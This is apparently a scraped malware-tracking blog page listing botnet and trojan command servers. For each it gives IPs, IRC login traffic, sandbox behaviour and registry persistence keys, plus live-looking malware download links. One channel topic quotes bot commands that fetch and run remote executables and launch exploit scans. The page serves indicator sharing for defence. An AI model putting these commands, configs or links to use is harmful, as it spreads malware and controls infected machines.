Remote Host Port Number 87.98.179.1 25 87.98.179.1 6667 NICK [UserName|821|United-States] NICK username1 PONG :4CA947ED PRIVMSG #barbiesrule :kh12795@gmail.com USER Win32-Liquid Victim #821 * :http://liquid-security.net JOIN #barbiesrule 3l173 PRIVMSG #barbiesrule :[Screenshot] Screen capture sent to kh12795@gmail.com. PRIVMSG #barbiesrule :[Login] I’m already owned by Shockwave! NICK [UserName|7114|United-States] PRIVMSG #barbiesrule :[Login] I’m at your service, Shockwave. Now talking inRead more...
unassigned.calpop.com(botnet hosted in United States Los Angeles Calpop.com Inc)
Remote Host Port Number 216.178.38.224 80 63.135.80.46 80 64.208.241.41 80 66.220.149.11 80 64.27.1.118 1866 PASS xxx NICK NEW-[USA|00|P|81244] USER XP-1086 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|81244] -ix JOIN #!high! test PONG 22 MOTD infos about hosting: http://whois.domaintools.com/64.27.1.118
56youku.3322.org (Trojan-Banker.Win32.Banker hosted in China Guangdong Chinanet Guangdong Province Network)
56youku.3322.org DNS_TYPE_A 183.7.66.173 – TCP Connection Attempts:183.7.66.173:8000 Suspicious Actions Detected Copies self to other locations Creates and executes scripts Creates files in windows system directory Creates system services or drivers exe file : http://ct.ftpvpn.info:3355/yuhaimin/windsca.exe anubis scan: http://anubis.iseclab.org/?action=result&task_id=1ef1923bf055827246da05311ccd4a263&format=html info about hosting: http://whois.domaintools.com/183.7.66.173
bad-girl.no-ip.biz(bifrose hosted in Germany Bremen Ewe-tel)
Resolved : [bad-girl.no-ip.biz] To [91.97.55.200] Remote Host Port Number 91.97.55.200 58281 Registry Modifications The following Registry Key was created: HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{E3FB2449-64ED-226C-A731-D39F73A3069B} The newly created Registry Values are: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{E3FB2449-64ED-226C-A731-D39F73A3069B}] StubPath = “%System%svhost32.exe” so that svhost32.exe runs every time Windows starts [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] Windows Host Prozess = “%System%svhost32.exe” so that svhost32.exe runs every time WindowsRead more...
50.22.148.142(linux bots hosted in United States Dallas Softlayer Technologies Inc)
var $config = array(“server”=>”50.22.148.142”, “port”=>1345, “pass”=>””, “prefix”=>”ClickDown”, “maxrand”=>4, “chan”=>”#dada”, “key”=>””, “modes”=>”+s”, “password”=>”click”, “trigger”=>”.”, “hostauth”=>”*” // * for any hostname Invisible Users: 31 Channels: 1 channels formed Clients: I have 32 clients and 0 servers Local users: Current Local Users: 32 Max: 779 Global users: Current Global Users: 32 Max: 288 download link here: http://50.22.148.142/pepinas.txt? moreRead more...
blenderartists(gbot hosted in United States San Antonio Slicehost)
DNS QueriesDNS Query Text blenderartists.org IN A + zonetf.com IN A + zonedg.com IN A + freeonlinedatingtips.net: type A, class IN, addr 69.42.208.146 bigspiderwomen.com: type A, class IN, addr 64.191.90.101 sharewareconnection.com: type A, class IN, addr 216.240.159.81 HTTP QueriesHTTP Query Text zonetf.com POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSvfuFuTLiv0agDgGxMl%2FvDr3WCGkrg%2B8OtBfBvOZTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D HTTP/1.1 blenderartists.org GET /external/Banners/facebook2.jpg?tq=gHZutDyMv5rJcyG1J8K%2B1MWCJbP4lltXIA%3D%3D HTTP/1.0 zonedg.com GET /images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917W65rJqlLfgPiWW1cg HTTP/1.0 Threads CreatedPIdRead more...
a1b.dyndns.tv(botnet hosted in Malaysia Kuala Lumpur Piradius Net)
Remote Host Port Number 124.217.248.138 20 PASS google_cache2.tmp NICK n{Ganja-USA|XP}752152 USER 5074 “” “TsGh” :5074 JOIN #panama PONG :irc.sdfadsf.com another dbs same ip: – DNS Queries: Name Query Type Query Result Successful Protocol security10.sytes.net DNS_TYPE_A 124.217.248.138 YES udp – IRC Conversations: From ANUBIS:1039 to 124.217.248.138:20 Nick: n{Ganja-AUT|XP}731969 Username: 0359 Server Pass: google_cache2.tmp Joined Channel: #mexicoRead more...
jjjjjj.ahrampress.net(botnet hosted in China Beijing Chinanet Hebei Province Network)
jjjjjj.ahrampress.net ip: 123.183.217.32 jjjjjj.ahrampress.net:6943 123.183.217.32 5943 123.183.217.32 6943 PASSWORD: eee Nick [N00_USA_XP_39922187] rssr SP2-917 * 0 :COMPUTERNAME Now talking in #j Channel: #j Topic is ‘.r.getfile -S|.r.getfile http://61.136.59.34/LWC/img/mheader.png C:radr.exe 1|.asc -S|.http http://61.136.59.34/LWC/dc0.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0Read more...
dc.drwhox.com(botnet hosted in China Beijing Chinanet Hebei Province Network)
Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 61.136.59.34 80 123.183.217.32 5943 123.183.217.32 6943 27.54.225.102 6943 PRIVMSG #dc1 :Err0r.. MODE [N00_USA_XP_7890652] @ -ix 00000030 | 5F36 3033 3038 3139 5D18 E740 0D0A 7365 | _6030819]..@..se 00000040 | 6E64 2023 6A2C 234D 6120 6F6F 6F6F 0D0A | nd #j,#Ma oooo.. 00000050 | 5052 5256 4D53 4720Read more...
irc.racrew.info(linux perl bots hosted in United States Arkadelphia Ezclick.net Inc)
irc conection: $servidor=’75.46.208.5′ unless $servidor; my $porta=’9191′; Channels: 5 channels formed Clients: I have 103 clients and 0 servers Local users: Current Local Users: 103 Max: 143 Global users: Current Global Users: 103 Max: 417 bot link : http://80.73.145.20/seguridad/c.txt downloader link: http://80.73.145.20/seguridad/ec.txt? rabot.txt: http://80.73.145.20/seguridad/rabot.txt infos about hosting: http://whois.domaintools.com/75.46.208.5